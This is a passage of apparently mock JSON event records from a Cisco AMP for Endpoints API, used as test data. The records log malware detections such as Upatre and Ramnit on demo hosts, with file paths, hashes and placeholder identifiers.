compromise","event_type_id":1107296262,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704828,"start_date":"2021-01-15T10:00:28+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"caee8a2c599ad6e46ffdec5fabadc438af5c2ae5266d2c1e120269fffda6e426"},"parent":{"disposition":"Clean","identity":{"sha256":"b4234acf96fbe0e0feca317a1928afac05105b73556990d89f8a18563e1a3c65"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":589000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180331452157132817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":495000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132816","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":339000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132815","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132814","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132813","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132812","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132811","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":246000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132810","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":168000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132809","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":407000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758218","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\iwkikcbw\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":345000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758215","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":189000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758213","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":17000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758212","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":970000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":939000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892411109048000,"timestamp":1610704826,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361000000300,"timestamp":1610704823,"timestamp_nanoseconds":0,"date":"2021-01-15T10:00:23+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704823,"start_date":"2021-01-15T10:00:23+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat 